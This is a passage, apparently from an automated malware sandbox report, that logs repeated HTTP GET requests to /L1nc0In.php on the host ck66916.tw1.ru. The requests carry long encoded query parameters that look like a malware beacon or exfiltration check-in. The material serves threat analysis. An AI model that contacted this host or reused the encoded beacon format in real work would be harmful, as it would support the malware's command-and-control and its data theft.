3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJN